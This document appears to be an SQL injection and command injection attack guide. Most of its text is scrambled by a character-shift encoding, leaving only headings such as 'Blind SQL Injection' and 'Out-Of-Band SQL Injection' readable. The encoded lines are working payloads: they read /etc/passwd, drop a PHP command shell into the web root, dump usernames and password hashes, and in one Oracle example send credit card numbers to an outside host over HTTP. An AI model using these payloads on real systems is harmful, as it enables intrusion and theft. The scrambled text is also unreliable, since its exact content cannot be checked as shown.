8GDMVDCNSGDMTLADQ SGDPTDQXBNLOKDSDRITRSEHMD8D@QDBKNRD ATSSGDQD
LHFGSADLNQD

GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
"MNSGDQDQQNQHMSGDNQCDQAXBK@TRD8DJMNVSGDQDHRLNQDSG@M ATSKDRRSG@M

GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
5GHRO@RRDCITRSEHMD.HFGSADLNQD KDSRSDRS

GSSO<RHSDBNL>O@FDOGO HCNQCDQAX
&QQNQ5GHRLD@MRVDG@UDBNKTLMR/NVVD@QDQD@CXENQRNLDAKHMC42-HMIDBSHNM
5GDQD@RNMENQCNHMFSGHRHRADB@TRDSGDTMHNMRDKDBSPTDQXLTRSG@UDSGDR@LDMTLADQ
NEBNKTLMRVGDMRDKDBSHMFEQNL@PTDQX
/NVVDQTMSGDENKKNVHMFNMSGDRHSD@MCRS@QSSDRSHMFENQRNLDS@AKDM@LDR

UNION ALL SELECT to enumerate database info


GSSO<RHSDBNL>O@FDOGO HCTMHNM@KKRDKDBS            
GSSO<RHSDBNL>O@FDOGO  TMHNM@KKRDKDBS            
NQ
GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS            
5GDMTLADQR  @MCCHROK@XNMSGDRBQDDMRNVDJMNVSG@SSGNRD@QDSGDBNKTLMR
SG@SVHKKDBGNA@BJC@S@ENQTR
GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS
  TRDQ
!!UDQRHNM    !!C@S@CHQ     

GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS  KN@C?EHKD DSB


O@RRVC
         
@MC
GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS
  KN@C?EHKD 0x2f6574632f706173737764
         
:NTB@MTRDSGHRHEXNTQTMHMSN@RDQUDQSG@SG@RL@FHBPTNSDRSTQMDCNM

4SQHMF&MBNCDQ
VFDSGSSOVVVFQ@XRB@KDQDRD@QBGNQFMDVBNCD4SQHMF&MBNCDQS@Q
S@QWUE4SQHMF&MBNCDQS@Q
BC4SQHMF&MBNCDQ
L@JD

BNMUDQSLWDSBO@RRVC
&MBNCDCENQ.:42-*MIDBSHNMR
0QHFHM@KDSBO@RRVC
&MBNCDCWEE

Blind SQL Injection


GSSO<RHSDBNL>O@FDOGO HC@MC
GSSO<RHSDBNL>O@FDOGO HC@MC
5DRSHERTARDKDBSVNQJR
VGDMRDKDBSRCNMSVNQJSGDMVDTRDRTARDKDBS
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBS

HEO@FDKN@CRMNQL@KKXSGDMRTARDKDBSRVNQJ
SGDMVDFNMM@RDDHEVDG@UD@BBDRRSNLXRPKTRDQ
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSEQNLLXRPKTRDQKHLHS 

HEO@FDKN@CRMNQL@KKXVDG@UD@BBDRRSNLXRPKTRDQ@MCSGDMK@SDQVDB@MOTKKRNLD
O@RRVNQCTRHFMKN@C?EHKD
ETMBSHNM@MC065'*-&

$GDBJS@AKD@MCBNKTLMM@LDR
5GHRHRO@QSVGDMFTDRRHMFHRSGDADRSEQHDMC

HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSEQNLTRDQRKHLHS 
 VHSGKHLHS 
NTQPTDQXGDQDQDSTQMRQNVNEC@S@ B@TRDRTARDKDBSQDSTQMRNMKXQNV SGHRHRUDQX
HLONQS@MS

SGDMHESGDO@FDKN@CRMNQL@KKXVHSGNTSBNMSDMSLHRRHMF SGDS@AKDTRDQRDWHSR
HEXNTFDS'"-4& RNLD@QSHBKDLHRRHMF
ITRSBG@MFDS@AKDM@LDTMSHKXNTFTDRRSGDQHFGS
NMD

KDSRR@XSG@SVDG@UDENTMCSG@SS@AKDM@LDHRTRDQR MNVVG@SVDMDDCHRBNKTLM
M@LD
SGDR@LD@RS@AKDM@LD VDRS@QSFTDRRHMF-HJDHR@HCADENQDSQXSGDBNLLNMM@LDRENQ
BNKTLMR
HD
GSSO<RHSDBNL>O@FDOGO HC@MC RDKDBSRTARSQHMF BNMB@S  O@RRVNQC
 
EQNL
TRDQRKHLHS 

HESGDO@FDKN@CRMNQL@KKXVDJMNVSG@SBNKTLMM@LDHRO@RRVNQC HEVDFDSE@KRDSGDM
SQXBNLLNMM@LDRNQITRSFTDRR

GDQDVDLDQFDVHSGSGDBNKTLMO@RRVNQC SGDMRTARSQHMFQDSTQMRSGDEHQRSBG@Q@BSDQ
 


1TKKC@S@EQNLC@S@A@RD
VDENTMCS@AKDTRDQRHBNKTLMRTRDQM@LDO@RRVNQCRNVDFNMM@OTKKBG@Q@BSDQREQNL
SG@S
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


NJSGHRGDQDOTKKRSGDEHQRSBG@Q@BSDQEQNLEHQRSTRDQHMS@AKDTRDQR
RTARSQHMFGDQDQDSTQMREHQRSBG@Q@BSDQ@MCBG@Q@BSDQHMKDMFSG@RBHH
BNMUDQSRSG@S
BG@Q@BSDQHMSN@RBHHU@KTD
@MCSGDMBNLO@QDHSVHSGRHLANKFQD@SDQSGDM
RNHESGD@RBHHBG@QFQD@SDQSGDM SGDO@FDKN@CRMNQL@KKX 536&

VDJDDOSQXHMFTMSHKVDFDSE@KRD

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5


BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


VDFDS536& JDDOHMBQDLDMSHMF

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5


BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


536&@F@HM GHFGDQ
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


'"-4&
RNSGDEHQRSBG@Q@BSDQHMTRDQM@LDHRBG@Q 
6RHMFSGD@RBHHBNMUDQSDQVDJMNVSG@S
BG@Q 
HRKDSSDQB
SGDMKDSRBGDBJSGDRDBNMCBG@Q@BSDQ
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


/NSDSG@SHLBG@MFDC  SN  SNFDSSGDRDBNMCBG@Q@BSDQ MNVHSQDSTQMRSGD
RDBNMCBG@Q@BSDQ BG@Q@BSDQHMKDMFGS

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5


BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


536& SGDO@FDKN@CRMNQL@KKX GHFGDQ

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5


BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


'"-4& KNVDQMTLADQ
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


536& GHFGDQ
GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5
BNMB@S TRDQM@LD W@ O@RRVNQC
EQNLTRDQRKHLHS 
 


'"-4&
VDJMNVSG@SSGDRDBNMCBG@Q@BSDQHRBG@Q 
@MCSG@SHRH8DG@UDBHRNE@Q
RNJDDOHMBQDLDMSHMFTMSHKXNTFDSSGDDMC VGDMQDSTQMRE@KRDVDJMNVSG@SVD
G@UDQD@BGSGDDMC


File Upload Via SQL Injection (MySQL)

5GD'*-&OQHUHKDFD
*EVDV@MSSNQD@CNQVQHSDSNEHKDRVDG@UDSNG@UDSGD'*-&OQHUHKDFD
'HQRSRDDVHBGTRDQVD@QDHMCAVHSGBNCD
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5BTQQDMS?TRDQ MTKK
XNTB@MOTSBTQQDMS?TRDQNQTRDQ
NQRXRSDL?TRDQ
5GHRVHKKFHUDTRSGDTRDQM@LD!RDQUDQ MNQL@KKX!KNB@KGNRS


:NTB@M@KRNTRDSGDENKKNVHMFAKHMC42-HMIDBSHNMRPTDQX
ATSHSRUDQXANNQHMF
(TDRR@M@LD
GSSO<RHSDBNL>O@FDOGO HCc"/%TRDQ
-*,&aQNNS
#QTSDSGDM@LDKDSSDQAXKDSSDQ
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% TRDQ

 
bL
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% TRDQ

 
bL
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% TRDQ

 
bLDBB
/NVVDLTRS@BBDRSNLXRPKTRDQRN
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5   EHKD?OQHU '30.LXRPKTRDQ
8)&3&TRDQaTRDQM@LD
ENQTRDQM@LDVDOTSSGDM@LDNEBTQQDMS?TRDQ
:NTB@M@KRNG@UD@KNNJ@SSGDVGNKDLXRPKTRDQS@AKDVHSGNTSSGD8)&3&BK@TRD ATS*
BGNRDSGHRV@XADB@TRDXNTB@MD@RHKX@C@OSSGDHMIDBSHNMENQAKHMC42-HMIDBSHNM
GSSO<RHSDBNL>O@FDOGO HCc"/%.*% 4&-&$5EHKD?OQHU'30.LXRPKTRDQ8)&3&
TRDQaTRDQM@LDb
 
a:

/@STQ@KKX SGHRHSR@AKHMCRNXTNB@MSVQHSD  ADBNTRDHSRMNS@TMHNMRDKDBS ATS


HSRRTARDKDBSR

:NTB@M@KRNQDBHDUDSGD'*-&OQHUHKDFDHMENEQNLSGDHMENQL@SHNMRBGDL@S@AKDNM.X42
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5FQ@MSDD HR?FQ@MS@AKD'30.
HMENQL@SHNM?RBGDL@TRDQ?OQHUHKDFDR8)&3&OQHUHKDFD?SXODaEHKDb"/%FQ@MSDDKHJD
aTRDQM@LD
-HJD*/AKHMCRPKH
c"/%.*% 4&-&$5HR?FQ@MS@AKD'30.HMENQL@SHNM?RBGDL@TRDQ?OQHUHKDFDR8)&3&
OQHUHKDFD?SXODaEHKDb"/%FQ@MSDDKHJDaTRDQM@LDb
 
b:

The web directory problem


0MBDVDJMNVHEVDB@MQD@CVQHSDEHKDRVDG@UDSNBGDBJNTSSGDQHFGSO@SG*MSGDLNRS
B@RDRSGD.X42-RDQUDQHRQTMMHMFNMSGDR@LDL@BGHMD@RSGDVDARDQUDQCNDR@MCSN
@BBDRRNTQEHKDRK@SDQVDV@MSSNVQHSDSGDLNMSNSGDVDACHQDBSNQX*EXNTCDEHMDMN
O@SG */50065'*-&VHKKVQHSDHMSNSGDC@S@A@RDCHQDBSNQX
0M.X42-VDB@MFDS@MDQQNQLDRR@FDCHROK@XHMFSGDC@S@CHQ
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5KN@C?EHKD b@
MTKK
0M.X42-VDTRD
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5!!C@S@CHQ MTKK
5GDCDE@TKSO@SGENQEHKDVQHSHMFSGDMHRC@S@CHQ=C@S@A@RDM@LD
:NTB@MEHFTQDNTSSGDC@S@A@RDM@LDVHSG
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5C@S@A@RD
MTKK
/NVSGDRDHMENQL@SHNM@QDG@QCSNFDSVHSGAKHMC42-HMIDBSHNM#TSXNTCNMbSMDDCSGDL
MDBDRR@QHKX+TRSL@JDRTQDXNTEHMCNTSSGDVDACHQDBSNQX@MCTRDRNLDSNITLO
A@BJEQNLSGDC@S@CHQ
*EXNT@QDKTBJXSGDRBQHOSTRDRLXRPK?QDRTKS
LXRPK?EQDD?QDRTKS
LXRPK?EDSBG?QNV

NQRHLHK@QETMBSHNMR@MCCHROK@XRV@QMHMFLDRR@FDR5GDMXNTB@MD@RHKXEHMCNTSSGD
VDARDQUDQCHQDBSNQXAXKD@UHMFSGNRDETMBSHNMRVHSGMNHMOTSSG@SSGDXVHKKSGQNV@
V@QMHMFLDRR@FDKHJD
8@QMHMFLXRPK?EDSBG?QNV
RTOOKHDC@QFTLDMSHRMNS@U@KHC.X42-QDRTKSQDRNTQBDHM
VDARDQUDQO@SGEHKDOGONMKHMDWWW
5NOQNUNJD@MDQQNQKHJDSGHRSQXRNLDSGHMFKHJD
GSSO<RHSDBNL>O@FDOGO HCc"/%bNQ@CCRNLDKHJDO@Q@L<>
5GHRVNQJR@SSGDLNRSVDARHSDR*EXNTbQDMNSKTBJXXNTG@UDSNFTDRRSGDVDACHQDBSNQX
NQSQXSNTRDKN@C?EHKD
SNEDSBGEHKDRNMSGDRDQUDQVGHBGLHFGSGDKOXNT)DQDHR@MDV
KHRSNEONRRHAKDKNB@SHNMRENQSGD"O@BGDBNMEHFTQ@SHNMEHKD VGHBGL@XRONHKSGD
VDACHQDBSNQXO@SG
DSBHMHSC@O@BGD
DSBHMHSC@O@BGD
DSBGSSOCGSSOCBNME
DSB@O@BGD@O@BGDBNME

DSB@O@BGDGSSOCBNME
DSB@O@BGD@O@BGDBNME
DSB@O@BGDGSSOCBNME
TRQKNB@K@O@BGDBNMEGSSOCBNME
TRQKNB@K@O@BGDBNMEGSSOCBNME
NOS@O@BGDBNMEGSSOCBNME
GNLD@O@BGDGSSOCBNME
GNLD@O@BGDBNMEGSSOCBNME
DSB@O@BGDRHSDR@U@HK@AKDCDE@TKS
DSB@O@BGDUGNRSRCCDE@TKS?UGNRSHMBKTCD
$GDBJNTSSGDVDARDQUDQRM@LDEHQRSAXQD@CHMFSGDGD@CDQHMEN@MCSGDMEHFTQDNTS
VGDQDHSTRT@KKXRSNQDRHSRBNMEHFTQ@SHNMEHKDR5GHR@KRNCDODMCRNMSGD04SXOD MHW
VHM
RNXNTL@XV@MSSNBGDBJSG@SNTSSNN6RD!!UDQRHNMNQUDQRHNM
SNEHMCSG@S
NTS
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5!!UDQRHNM MTKK
MSKNF@SSGDDMCLD@MRHSbR@VHMCNVRANW KNFNMKXLD@MRHSbR MHWANW
0QS@JD@KNNJ@SSGDO@SGRHMDQQNQLDRR@FDRNQ@SSGDGD@CDQ
5XOHB@KVDACHQDBSNQHDRSNFTDRRBNTKCAD
U@QVVVQNNS
U@QVVVCAM@LDO@SG
U@QVVVRHSDM@LDGSCNBR
U@QVVVKNB@KGNRSGSCNBR


#@RHB@KKXXNTRGNTKCAD@KKNVDCSNVQHSDHMSN@MXCHQDBSNQXVGDQDSGD.X42-RDQUDQG@R
VQHSD@BBDRRSN @RKNMF@RXNTG@UDSGD'*-&OQHUHKDFD)NVDUDQ @M"CLHMHRSQ@SNQB@M
KHLHSSGDO@SGENQOTAKHBVQHSD@BBDRR
Create useful files
0MBDXNTEHFTQDCNTSSGDQHFGSCHQDBSNQXXNTB@MRDKDBSC@S@@MCVQHSDHSHMSN@EHKDVHSG
GSSO<RHSDBNL>O@FDOGO HCc6/*0/4&-&$5BNKTLMM@LD MTKK'30.S@AKDM@LD
*/50065'*-&aVDAO@SGEHKDSWS
RNLDSHLDREQNLLXRPKTRDQ

0QSGDVGNKDC@S@VHSGNTSJMNVHMFSGDS@AKDBNKTLMM@LDR
GSSO<RHSDBNL>O@FDOGO HCc03*/50065'*-&aVDAO@SGEHKDSWS
*EXNTV@MSSN@UNHCROKHSSHMFBG@QRADSVDDMSGDC@S@ TRD*/50%6.1'*-&HMRSD@CNE
*/50065'*-&
:NTB@M@KRNBNLAHMDKN@C?EHKD
VHSGHMSNNTSEHKD KHJDOTSSHMF@BNOXNE@EHKDSNSGD
@BBDRR@AKDVDARO@BD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5KN@C?EHKD b_b
*/50065'*-&
a_
*MRNLDB@RDR*bCQDBNLLDMCSNTRD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5GDW KN@C?EHKD b_b

*/50
065'*-&a_

@MCCDBQXOSHSK@SDQVHSGSGD1)1$G@QRDS&MBNCDQ DRODBH@KKXVGDMQD@CHMFSGD.X42C@S@EHKDR
0QXNTB@MVQHSDVG@SDUDQXNTV@MSHMSN@EHKD
GSSO<RHSDBNL>O@FDOGO HCc"/%6/*0/4&-&$5aBNCDb MTKK*/50065'*-&a
VDARDQUDQCHQEHKDOGO
)DQD@QDRNLDTRDETKBNCDDW@LOKDR
"/NQL@KBNCDENQ@RGDKK 1)1

 RXRSDL ?(&5<KNK>
 
HSRUDQXHLONQS@MSSG@SSGD1)1R@ED?LNCDLTRSADSTQMDCNEE
*EHRSTQMDCNML@XADVDB@MAXO@RRRXLOKDVHSG@GDWBNMUDQSDQ
VDB@MBNMUDQSSGDBNCDENQAXO@RR."(*$?2605&4?(1$EHKSDQ
MNQL@KKXXTNB@MRDDHEGDW?LNCDVNQJVHSG@KN@C?EHKD O@SGHMGDW

KHJDKN@C?EHKD WEE
ENQDSBO@RRVNQC TRT@KKXO@SG

VDB@MRDD@KNSNEHMENQL@SHNMR@ANTSSGDVDARDQUDQBNMEHFTQ@SHNMVHSG
 OGOHMEN
 
42-26&3:
 QDRTKSLXRPK?PTDQX ?(&5<PTDQX>
 
5QXSNTRDKN@C?EHKD
SNFDSSGDC@S@A@RDBNMMDBSHNMBQDCDMSH@KR NQSQXSNHMBKTCD@M
DWHRSHMFEHKDNMSGDVDARDQUDQVGHBGG@MCKDRSGDLXRPKBNMMDBS
3&LDLADQSG@SSGDPTNSDR@QDQDPTHQDC@MCRNHESGDDQQNQ@QDKHJD
DQQNQCAMD@Q=VVVQNNSO@SGO@FDOGO=
L@XADHSRADBNTRDSGDPTNSDR@QDMNS@KKNVDC VHSGRODBH@KEHKSDQTRDCENQ@MSHWRR

4N@SSGDDMCS

SQL Injection Against Oracle

Error Based SQL Injection


GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBSA@MMDQEQNL
UUDQRHNMVGDQDQNVMTL


GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4&-&$5TRDQ'30.CT@K



5GHRRGNTKCVNQC@F@HMRS0Q@BKD H @MCF
GSSO<RHSDBNL>O@FDOGO HCb@MCBSWRXRCQHSGRWRM  RDKDBSTRDQEQNLCT@K


5GHRHR@M@KSDQM@SHUDSG@SRGNTKCVNQJ@F@HMRSF

GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4&-&$5FKNA@K?M@LD


'30.FKNA@K?M@LD



GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4DKDBSFQ@MSDC?QNKDEQNL


RDKDBSQNVMTLQ FQ@MSDC?QNKDEQNLTRDQ?QNKD?OQHUR
VGDQDQ


GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR 4DKDBSFQ@MSDC?QNKDEQNL
RDKDBSQNVMTLQ FQ@MSDC?QNKDEQNLTRDQ?QNKD?OQHUR
VGDQDQ


GSSO<RHSDBNL>O@FDOGO HCTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBS
RXR?BNMSDWS 64&3&/7 %#?/".&
'30.CT@K



Union Based SQL Injection


GSSO<RHSDBNL>O@FDOGO HCMTKKTMHNM@KKRDKDBSTRDQM@LD'30.@KK?TRDQR
GSSO<RHSDBNL>O@FDOGO HCMTKKTMHNM@KKRDKDBSBNMB@S TRDQM@LD 
'30.
@KK?TRDQR
Obtaining the Current User's Password Hash in Oracle with UNION SELECT ALL
(Privileged Database User Account Required)
 &MTLDQ@SDSGDMTLADQNEBNKTLMREQNLSGDNQHFHM@KPTDQXAXTSHKHYHMFSGD03%&3
#:SDBGMHPTD #DFHMVHSG@QDK@SHUDKXGHFGMTLADQSNSDRSVGDSGDQSGDO@FDKN@CR *E
RN CHUHCDAXG@KE *EMNS @CCAXNESG@SHMCDW 3HMRD@MCQDOD@SDUDQXSHLD
5GHMJNEHS@R@L@MT@KAHM@QXRD@QBG NMDQDPTDRS@S@SHLD
5@JDMNSDNEVG@SSGDO@FDKNNJRKHJDENQ@U@KHCPTDQXAXUHRHSHMF UHBSHLBNL
OQNCTBSR@RO HC
UHBSHLBNLOQNCTBSR@RO HC 03%&3 #: 
 *ESGDO@FDKN@CR@MDQQNQO@FDNQ@AK@MJO@FD SGDMTLADQNEBNKTLMREQNLS@AKD
ADHMFPTDQHDCHRADKNV
UHBSHLBNLOQNCTBSR@RO HC 03%&3 #: 
 *ESGDO@FDKN@CR@MDQQNQO@FDNQ@AK@MJO@FD SGDMTLADQNEBNKTLMREQNLS@AKD
ADHMFPTDQHDCHRADKNV
UHBSHLBNLOQNCTBSR@RO HC 03%&3 #: 
 *ESGDO@FDKN@CR@MDQQNQO@FDNQ@AK@MJO@FD SGDMTLADQNEBNKTLMREQNLS@AKD
ADHMFPTDQHDCHRADKNV
UHBSHLBNLOQNCTBSR@RO HC 03%&3 #: 
*ESGDO@FDKN@CRSGDU@KHCO@FDEQNLHC VDBNMBKTCDSGDQDV@RMNDQQNQ@MCSG@S
SGDMTLADQNEBNKTLMRHMSGDS@AKDADHMFPTDQHDCHR
 4DDHE@MDLOSXO@FDVHKKKN@CENQ@MDF@SHUDHMCDWU@KTDAXUHRHSHMF
UHBSHLBNLOQNCTBSR@RO HC
*ESGDO@FDKN@CRVG@S@OOD@QRSNADSGDRJDKDSNM)5.-O@FDVHSGNTS@MXC@S@Q@SGDQ
SG@MQDCHQDBSHMFXNTSN@MDQQNQO@FD VDB@MBNMBKTCDSG@SHSHRKHJDKXVDVHKKAD@AKDSN
DWSQ@BSC@S@EQNLVHSGHMSGD)5.-
 4HMBDSGDL@WHLTLMTLADQNEBNKTLMRHMSGDDW@LOKD@ANUDHR UHRHS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "-- MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK




#DFHMQDOK@BHMFNMDBNKTLM@S@SHLDVHSGDHSGDQ@MTLADQNQRSQHMF

"QDPTHQDLDMSSNRTBBDRRETKKXODQENQL@6/*0/4&-&$5"--@SS@BJHM0Q@BKDHRSG@SSGD
C@S@SXODRNEXNTQBNKTLMRLTRSL@SBGSGDBNKTLMSXODRNESGDNQHFHM@KPTDQX *MNSGDQ
VNQCR HEXNTUHRHS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "--  MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

:NTQFN@KHRSG@SHSKN@CRSGDR@LDO@FDXNTR@VENQUHBSHLBNLOQNCTBSR@RO HC *E
HSKNNJRKHJD@MDQQNQO@FDNQ@BNLOKDSDKXAK@MJO@FD XNTB@MBNMBKTCDSG@SSGDNQHFHM@K
PTDQXG@R@RSQHMFC@S@SXODENQSGDEHQRSBNKTLMNESGDPTDQXQ@SGDQSG@M@MHMSDFDQ *E
SG@SHRSGDB@RD DMSDQ
UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "-- @ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

*E)5.-HROQDRDMS KNNJENQ@@BG@Q@BSDQ@MXVGDQDVHSGHMSGDO@FD *EXNTG@UD
MNSENTMCHS BNMSHMTDQDOD@SHMFRSDOTMSHKXNTG@UDRTBBDRRETKKXENTMCDHSGDQ@M
HMSDFDQNQRSQHMFSG@SKN@CRVHSGHMSGDVDAO@FD *MSGHRDW@LOKD XNTG@UDBNKTLMR
@SXNTQCHRONR@K
 -DSRR@XSG@SBNKTLMSVNFHUDRXNT@BG@Q@BSDQSG@SKN@CRHMSNSGDVDAO@FD 5G@SHR
VGDMXNTUHRHSSGHRO@FDXNTRTBBDRRETKKXRDD@@BG@Q@BSDQVHSGHMSGDVDAO@FDBNMSDMS
UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "-- MTKK @ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK

 'QNLGDQD BNMUDQSSGHR6/*0/4&-&$5RS@SDLDMSHMSNNMDSG@SVHKKCHROK@XSGD
O@RRVNQCG@RGENQSGDBTQQDMSC@S@A@RDTRDQ

UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "-- MTKK TRDQ MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKKEQNL

UHBSHLBNL
OQNCTBSR@RO HC6/*0/ 4&-&$5 "-- MTKK O@RRVNQC MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKK MTKKEQ

*MD@BGQDPTDRS KNNJENQSGDQDRODBSHUD0Q@BKDC@S@A@RDTRDQM@LD@MCO@RRVNQCG@RG
5GDO@RRVNQCG@RGRGNTKCADCHROK@XDC@R@BG@Q@BSDQU@KTD
Blind SQL Injection
GSSO<RHSDBNL>O@FDOGO HC5&45
OQNCTBDR@FHUDMO@FD

GSSO<RHSDBNL>O@FDOGO HC5&45b@MC RDKDBSTRDQEQNLCT@K


4$055
OQNCTBDRSGDR@LDO@FD

GSSO<RHSDBNL>O@FDOGO HC5&45b@MC RDKDBSTRDQEQNLCT@K


'00
OQNCTBDR@ CHEEDQDMSO@FD

Out-Of-Band SQL Injection


GSSO<RHSDBNL>O@FDOGO HC4$055b@MC RDKDBSTSK?HM@CCQFDS?GNRS?@CCQDRR RDKDBS
TRDQEQNLCT@K
[[IDKD@QMRDBTQHSXNMKHMDBNL
EQNLCT@K
HRMNSMTKK

GSSO<RHSDBNL>O@FDOGO HC4$055b@MC RDKDBS


RTL KDMFSG TSK?GSSOQDPTDRS GSSOVVVKD@QMRDBTQHSXNMKHMDBNL
[[BBMTLADQ[[[[EM@LD[[[[KM@LD

EQNLBQDCHSB@QC

5GHRRGNTKCVNQC@F@HMRS0Q@BKD H @MCF
GSSO<RHSDBNL>O@FDOGO HC4$055b@MC 4&-&$54:4%#.4?-%"1*/*5 4&-&$5
TRDQEQNLCT@K
[[KD@QMRDBTQHSXNMKHMDBNL 
'30.%6"-
HRMNSMTKK
5GHRHR@M@KSDQM@SHUDSG@SRGNTKCVNQJ@F@HMRSF

Heavy Queries
GSSO<RHSDBNL>O@FDOGO HC[[ RDKDBSEQNLCT@KVGDQD RDKDBSBNTMS
EQNL
@KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS
@MC RDKDBSTRDQ
EQNLCT@K
4$055


5GHRPTDQXK@RSR@ANTSRDBNMCR
GSSO<RHSDBNL>O@FDOGO HC[[ RDKDBSEQNLCT@KVGDQD RDKDBSBNTMS
EQNL
@KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS @KK?TRDQRS
@MC RDKDBSTRDQ
EQNLCT@K
9999


5GHRPTDQXK@RSRRDBNMCRNVDJMNVSGDTRDQHR4BNSS

Command Injection
Identifying Command Injection Vulnerabilities
*MRNLDB@RDR HSL@XADONRRHAKDSNQTM@QAHSQ@QXBNLL@MCRSGQNTFGSGDVDA
@OOKHB@SHNM 5GHRVHKKADSQTDVGDM@VDARHSD@OOD@QRSNS@JDTRDQHMOTS@MCTONM
RTALHSSHMFSGDHMOTS SGDCXM@LHB@KKXFDMDQ@SDCNTSOTSKNNJRRHLHK@QSNSGDQDRTKSNE@
BNLL@MCADHMFDWDBTSDC
Command Injection: Appending a Command
*E@VDARHSDG@R@+@U@RBQHOSCQNOCNVMLDMTVHSGBNLL@MCRKHJDOHMF EHMFDQ @MC
SQ@BDQNTSD @MCSGHRLDMTHRQHFGSADRHCD@VDAENQLSG@SS@JDRHM@MHO@CCQDRR XNT
DMSDQ@U@KHCHO@CCQDRR@MCRDKDBSOHMF 0ARDQUDSGDQDRTKSR CNSGDXKNNJRHLHK@QSN
SGDQDRTKSHEXNTQ@MOHMF
4XRSDL 
ETMBSHNM

*SHRKHJDKXSG@S@RSQHMFHRADHMFBNMB@SDM@SDC@MCO@RRDCSN@

4XRSDL OHMF HO




*MSGHRB@RD @SSDLOSSN@OODMC@M@CCHSHNM@KBNLL@MCSNSGDDMCNESGDRSQHMF "ESDQ


RDKDBSHMFOHMFEQNLSGDCQNOCNVMLDMT HMSGDHO@CCQDRRENQL SXOD
B@SDSBO@RRVC
NQSXOD B@SDSBO@RRVC



Command Injection: Injecting Code to Run Commands


4NLDVDARHSDRL@XG@UD@AHFENQLSG@SHRHMSDMCDCSNHMSDQOQDSRNLDBNCD SGDMVGDM
SGDBNCDHRQTMNMSGDVDARHSD SGDNTSOTSHRCHROK@XDCVHSGHMSGDO@FD 5GHRL@XAD
SQTDVHSGSTSNQH@KRHSDRSG@SG@UD@MNOSHNMSN&MSDQ@AKNBJNEBNCD *MSGDRDB@RDR
@SSDLOSSNDMSDQBNCDSG@SVHKKB@KKSGD4XRSDLETMBSHNM 'NQDW@LOKD

4XRSDL B@S

DSBO@RRVC


Backdoor Uploading Attacks
8DA@OOKHB@SHNMRNESDM@KKNVENQEHKDRRTBG@RHL@FDR@MCCNBTLDMSRSNADTOKN@CDCSN
SGDQDLNSDRDQUDQ *SBNTKCADONRRHAKDSG@SSGDX@QDMNSOQNODQKXUDQHEXHMFSGDEHKDSXOD
OQHNQSN@KKNVHMFHSSNADTOKN@CDC *ESGHRHRSQTD HSBNTKCADONRRHAKDSNTOKN@C@
A@BJCNNQ 5NSDRSSGHRNTS ENKKNVSGDRDRSDOR
